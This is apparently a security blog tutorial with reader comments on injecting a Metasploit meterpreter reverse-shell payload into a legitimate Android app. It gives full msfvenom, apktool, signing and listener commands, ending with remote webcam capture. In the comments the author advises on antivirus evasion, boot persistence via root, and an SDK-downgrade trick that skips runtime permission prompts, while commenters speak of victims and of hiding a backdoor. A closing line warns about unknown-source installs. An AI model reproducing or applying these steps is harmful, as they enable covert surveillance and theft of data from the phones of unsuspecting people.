Inject a meterpreter payload. This video shows how to manually inject a meterpreter payload into an Android application. With this method, once you get the victim to install the infected application, you can gain control over the device; including camera, microphone, location, etc. Note that, for the victim to install the infected application, the device has to be configured to allow installations from unknown sources, which is a bad security practice for mobile devices.
Manually injecting a meterpreter payload:
1) Generate msfvenom Android payload.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.6 LPORT=4444 R > payload.apk
2) Decode payload witk apktool.
apktool d payload.apk
3) Decode target app with apktool.
apktool d com.securitygrind.application.apk
4) Inject payload code into decoded target app.
mkdir com.securitygrind.application/smali/com/metasploit/
mkdir com.securitygrind.application/smali/com/metasploit/stage
cp payload/smali/com/metasploit/stage/* com.securitygrind.application/smali/com/metasploit/stage/
5) Add meterpreter hook.
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
6) Inject permissions in AndroidManifest.xml
<uses-permission android:name=”android.permission.INTERNET”/>
<uses-permission android:name=”android.permission.ACCESS_WIFI_STATE”/>
<uses-permission android:name=”android.permission.CHANGE_WIFI_STATE”/>
<uses-permission android:name=”android.permission.ACCESS_NETWORK_STATE”/>
<uses-permission android:name=”android.permission.ACCESS_COURSE_LOCATION”/>
<uses-permission android:name=”android.permission.ACCESS_FINE_LOCATION”/>
<uses-permission android:name=”android.permission.READ_PHONE_STATE”/>
<uses-permission android:name=”android.permission.SEND_SMS”/>
<uses-permission android:name=”android.permission.RECEIVE_SMS”/>
<uses-permission android:name=”android.permission.RECORD_AUDIO”/>
<uses-permission android:name=”android.permission.CALL_PHONE”/>
<uses-permission android:name=”android.permission.READ_CONTACTS”/>
<uses-permission android:name=”android.permission.WRITE_CONTACTS”/>
<uses-permission android:name=”android.permission.RECORD_AUDIO”/>
<uses-permission android:name=”android.permission.WRITE_SETTINGS”/>
<uses-permission android:name=”android.permission.CAMERA”/>
<uses-permission android:name=”android.permission.READ_SMS”/>
<uses-permission android:name=”android.permission.WRITE_EXTERNAL_STORAGE”/>
<uses-permission android:name=”android.permission.RECEIVE_BOOT_COMPLETED”/>
<uses-permission android:name=”android.permission.SET_WALLPAPER”/>
<uses-permission android:name=”android.permission.READ_CALL_LOG”/>
<uses-permission android:name=”android.permission.WRITE_CALL_LOG”/>
<uses-feature android:name=”android.hardware.camera”/>
<uses-feature android:name=”android.hardware.camera.autofocus”/>
<uses-feature android:name=”android.hardware.microphone”/>
7) Re-build target app with apktool.
apktool b com.securitygrind.application
8) Sign the target app apk with jarsigner.
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /securitygrind/key/mykeystore.ks com.securitygrind.application/dist/com.securitygrind.application.apk mykeystore
9) zipalign the target app apk.
zipalign -v 4 com.securitygrind.application/dist/com.securitygrind.application.apk com.securitygrind.application/dist/securitygrind.apk
10) Install the target app.
You need to first enable installation from Unknown Sources: Settings -> Security -> Unknown Sources (turn on)
11) Start the msfconsole reverse handler.
echo “use exploit/multi/handler” > meterpreter.rc
echo “set PAYLOAD android/meterpreter/reverse_tcp” >> meterpreter.rc
echo “set LHOST 192.168.0.6” >> meterpreter.rc
echo “set LPORT 4444” >> meterpreter.rc
echo “exploit -j -z” >> meterpreter.rc
msfconsole -r meterpreter.rc
12) Run the target app.
Run the app on the device.
Check the msfconsole for reverse handler session.
13) Interact with the session.
sessions -i 1
webcam_snap
14) ENJOY!
Conclusion
This post shows how manually injecting a meterpreter payload into an Android application works, so, unless you know what you are doing, allowing installations from unknown sources represents a high risk for the mobile user, since applications that may seem harmless at first sight, could contain malware that puts the user information and privacy at risk.
Hello, after the bundle, the payload does not get permission.Opening the camera will crash.
Hi,
Try this: set the <uses-sdk> tag as shown below when tampering the application:
<uses-sdk android:minSdkVersion="22" android:targetSdkVersion="22" />More details in a below comment started by Rehman and followed up by Mubarak.
Regards,
Cristian
Hello the program installed correctly . Avg antivirus detected it , and i cant access the meterpreter session . it cant open !
Hi,
To avoid detection you may want to use an obfuscated or even encrypted payload, this can be accomplished by using a tool like Veil-Evasion or Venom, similar to this: https://gbhackers.com/bypass-antivirus-using-payload/
Thanks,
Cristian
Hi, how can i re connect the sessions after kill the sessions? and after the target phone shutdown ….Please
Hi,
Well, you could create and execute a small script that uses the am (activity manager) to constantly start the main activity in the app, which will spawn new meterpreter sessions. However, that will stop working after a shutdown/restart, to really persist control over the device, you would be first required to gain root access; so that you can write a similar script into system/etc/init.d and register the script to start at boot time.
Thanks,
Cristian
can this method bypass AV and google play protection ?
Not really, meterpreter payloads are very common, any decent AV should be able to detect it.
Hello, in pass 8, where can i find my key? i’m trying to sign spotify. thanks
Hello Alex,
Since we are tampering the application, you will need to use your own key for signing the resulting application. If you don’t have a key, then you can create it using keytool, with a command similar to this:
keytool -genkey -v -keystore key.keystore -alias alias -keyalg RSA -keysize 2048 -validity 10000Regards,
Cristian
I am getting an error when I have installed the apk binded with payload on my android device.
Error:
java.lang.NoClassDefFoundError: Failed resolution of: Lcom/metasploit/stage/e; at com.metasploit.stage.Payload.startInPath(Unknown Source:13) at com.metasploit.stage.Payload.start(Unknown Source:10)…at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:873)Caused by: java.lang.ClassNotFoundException: Didn’t find class “com.metasploit.stage.e” on path: DexPathList[[zip file “/system/framework/org.apache.http.legacy.boot.jar”,… at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:134) at java.lang.ClassLoader.loadClass(ClassLoader.java:379) at java.lang.ClassLoader.loadClass(ClassLoader.java:312) … 18 more
Hello,
Well, it looks like something went wrong in step 4 while injecting the payload code into the decoded target application. The error points at a Class that hasn’t been defined, so, either the stage code was not included/injected or there was a problem while re-building the app with apktool. I recommend revisiting those steps!
Regards,
Cristian
Hi when i trying to start the app in my phone its just up for 1 second then crushing with error “Not Responding”
Hello,
Please check the logs with logcat to check for a more specific error message, the “Not Responding” message is not specific enough to troubleshoot.
Regards,
Cristian
problem occured in rebuilding the app
I: Smaling smali_classes2 folder into classes2.dex…
[Fatal Error] :23:35: Open quote is expected for attribute “android:name” associated with an element type “uses-permission”.
I: Building resources…W: /home/suriyaprakash/Downloads/gallery/AndroidManifest.xml:23: error: Error parsing XML: not well-formed (invalid token)
…res, -M, /home/suriyaprakash/Downloads/gallery/AndroidManifest.xml]
please help
Hi Surya,
It looks like there is an error in your AndroidManifest.xml file, near the section where you are setting the permissions (uses-permissions), please double check that this section is well formed (there seems to be a missing double quote somewhere). Also, if you copy the uses-permissions from this post and pasted it into you AndroidManifest.xml, then check that the pasted text is well formatted (under XML format standard).
Regards,
Cristian
sir i bind payload successfully using msfvemon and then i install inject apk to my mobile the permission is not auto allow
its allow mutually then work all things
please give any solution
Hi Rehman,
I’m not sure I follow, but, I’ll try to respond. In short, yes, the victim user needs to approve the permissions during installation of the application, this is just how the system works. Now, the delivery method of this attack relies more on the fact that some users just don’t pay attention to what they are accepting to while installing an application. To the keen user, having an application asking for too many or unnecessary permissions should be a red flag.
Regards,
Cristian
@Cristian R.
What he exactly asking is.
If you install just payload without embedding into any apk then by default all the permissions which were specified in androidmanifest is enabled by default.
but if you embedd the payload (as shown in this article) then by default all the permissions are disabled and you have to write runtime permission to ask the user in mainactivity of the app again.
is there any workaround for this?
Hello Mubarak,
I see, thanks for clarifying, that’s a good question! I think that depends on the API level you are targeting, runtime permissions are required when targeting API 24 and above.
One approach would be to use only the permissions that are strictly required for an attack and add code for requesting runtime permissions for only those (not the entire list we used in the above post).
Now, I was also experimenting with this and might have found a workaround (but it is kind of ugly): when tampering the application, also set the SDK version within the AndroidManifext.xml as follows:
<uses-sdk android:minSdkVersion="23" android:targetSdkVersion="23" />This will make the application target an API level below API 23 (since we are already tampering the application permissions, why not add our own
This is what I did for an application targeting API level 23 or above:
1. Tampered the application and included the required Android permissions.
2. Re-built the application.
3. After installing and running the application I get the meterpreter session.
4. Try to take photo (webcam_snap).
5. Got Operation failed error message.
6. Checking logcat, this is due to a Permission Denial: can’t use camera (since no runtime permissions were asked).
Now, I do the following for the same application:
1. Tamper the application, include the required Android permissions AND the <uses-sdk> tag as described above.
2. Re-built the application.
3. After installing and running the application I get the meterpreter session.
4. Try to take photo (webcam_snap).
5. Got frame (success).
Regards,
Cristian
How to auto allow all the permission of payload
Hari,
Try this: set the <uses-sdk> tag as shown below when tampering the application’s AndroidManifest.xml:
<uses-sdk android:minSdkVersion="23" android:targetSdkVersion="23" />More details in the comment started by Rehman and followed up by Mubarak right before your comment.
Regards,
Cristian
Hi, after installing the payload on the victim’s phone, the meterpreter sessions gets timedout. Like, Meterpreter session 2 closed. Reason: Died. Is there any permanent solution for this. As far, I have seen is, only if you turn the autostart option as true in android device, the session stays alive. If not, the session dies after some 5 or 6 minutes.
Hi,
I’m not sure about this one, I’ve seen similar problems that are related either to AV, network or even when using an old version of metasploit. I’d suggest taking a look at the metasploit logs and see if there is something useful in there (Metasploit Logs).
Regards,
Cristian
Hi
Can You please tell me how to reduce the permissions ?
As you know, there are a large number of permissions .
I personally don’t need all the permissions & It also makes the victim suspicious of my BACKDOOR, Every time I try to modify the payload, I lose the session Or an error occurs during installation .
Also, I am not trying to Inject the application with a backdoor. Otherwise, I would have solved the permissions issue from :~$ leafpad appfile/AndroidManifest.xml
I am working on a simple payload and all I want is reduce the permissions
HOPE YOU CAN HELP ME
Hello,
I’m not aware of any way to specify which permissions you want to add when creating the Android backdoor using mfsvenom.
Instead, you could generate the usual apk backdoor, reverse that with apktool (using the d flag, similar to what’s done in the above article), edit the AndroidManifest.xml file to leave only the permissions you need and then rebuild the backdoor with apktool too (by using the b flag, similar to above).
Regards,
Cristian
Hello , I tried the fix provided for the permissions issue but it doesn’t seem to work as I don’t seem to have the ” ” tag, but here is what I have instead, and yea I already changed the value to 23 and still the embedded app will state that it does not require any special permissions at the install time
Hi,
It looks like your comment got mangled a little bit, I don’t think all the details got through. In any case, with the uses-sdk tag, the idea is that permissions are sort of “auto-allowed” when the application is installing, this is because later SDK versions will also require the application to request permissions at runtime (not only at installation time), which makes the approval of permissions a little more complicated from the attacker’s point of view.
Regards,
Cristian
Hi Sir,
Greetings!
I could install the payload but the app is not opening in the target machine. I have tried after disabling the antivirus programs. Please help!
Thank you in advance!
Hello,
Could be many things, have you tried reviewing the logs with logcat to see if you can find a clue? You can also try generating and installing a pure msfvenom apk payload and check if that works.
Regards,
Cristian
Hello !
When I run the webcam_snap command in the meterpreter and then it shows a error like this –
meterpreter > webcam_snap
[*] Starting…
[*] 127.0.0.1 – Meterpreter session 2 closed. Reason: Died
And then the app will close automatically.
Please help me to resolve this !
Thank You !
Hello Shehan,
Difficult to say with only that information. I suggest reviewing the logs with logcat to see what you can find, you can also try generating and installing a pure msfvenom apk payload and check if that works.
Regards,
Cristian
I tried and tried but no luck.
does anyone tried with spotify (modded ver)?
Hello,
Are you getting any errors at any of the steps? It’s hard to say without more details.
Regards,
Cristian
on step 3, apktool does not decode properly: when i try to open the androidmanifest.xml i hit an error about format file and decoding…
Exactly what the error you are seeing? Please share more details.
Regards,
Cristian
when i am trying to build apk from apk tool then i got thise error plz help me
root@hp-HP-431-Notebook-PC:/home/hp/Desktop# apktool b bajaj
I: Using Apktool 2.4.0-dirty
I: Checking whether sources has changed…
I: Smaling smali folder into classes.dex…
Exception in thread “main” org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/collection/LongSparseArray;->clone()Landroidx/collection/LongSparseArray;
at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:917)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:341)
at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
at brut.androlib.Androlib.buildSources(Androlib.java:350)
at brut.androlib.Androlib.build(Androlib.java:302)
at brut.androlib.Androlib.build(Androlib.java:269)
at brut.apktool.Main.cmdBuild(Main.java:247)
at brut.apktool.Main.main(Main.java:79)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1190)
at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:913)
… 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65541
at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1150)
… 11 more
Hi Mohit,
I’m not familiar with this error, I’d suggest you use the latest version of apktool and give it a try to see how it goes,
Regards,
Cristian
this is because of the encoder i faced the same problem but when removed the encoder the problem was solved
and yeah i have a problem about injecting the hook like where do i do this i have no idea
Hi can someone access Android root if phone is not rooted
And what if victim install application but does not give it any permission at all. In that case will someone can acces sms, contact and other info of targets phone.
Hey Abrar,
If the phone is not rooted, then getting access to root is what you do via the process of rooting, so the answer is yes!
Also, for the second question, a few comments above someone already asked something similar I believe, there is a workaround which is to set the SDK version when tampering the application. On the AndroidManifext.xml use something like the following:
<uses-sdk android:minSdkVersion=”23″ android:targetSdkVersion=”23″ />
This will make the application target API level 23 (since we are already tampering the application permissions, why not add our own target tag as well?). This works, because on API 23 the security enhancements around permissions (like requiring the user to manually approve them) are not present.
Regards,
Cristian
In my App, LoginActivity.smali does not exist what to do now?
hello , thank u so much
can u tell me why youtube removing my videos about hacking
and a lots of guys upload same content about hacking video but youtube did not remove them
Hi Ahmed,
I read somewhere that youtube was tightening up their policies around hacking material, but not sure exactly what the reasoning behind what to remove or not remove is.
Regards,
Cristian
The problem is there are two AndroidManifest.xml.One is in the root of decompiled app and other is in original folder.Which should i edit?And the one in the original file is not readable.its like encrypted.
Hello there I am facing a problem when the app is run by the user I am getting session but when the user closed the app the session keep dying …… Yeah I execute the shell script bit it is not working on Android version 8,9,10,11,12 the presistance is not working
hi sir,
i make payload with msfvenom and also i inject payload with this command,
msfvenom -x ex.apk android/meterpreter/reverse_tcp lhost= lport= -o ex.apk
all things done 100%
but when i install apk in target machine, it show error
app is not responding,
app is close,
some apps show black screen,
this is older version app may not work properly
even sometimes they show error this app is compromised.
sir please tell me solution,
waiting,
thanks
I am not able to generate apktool d com.securitygrind.application.apk
error occur Input file (com.securitygrind.application.apk) was not found or was not readable.
bro how to slove prblm of meterpreter session closed reason dead pls tell me how to slove this as soon as possible
Enter Passphrase for keystore:
bu alana ne girmem gerekiyor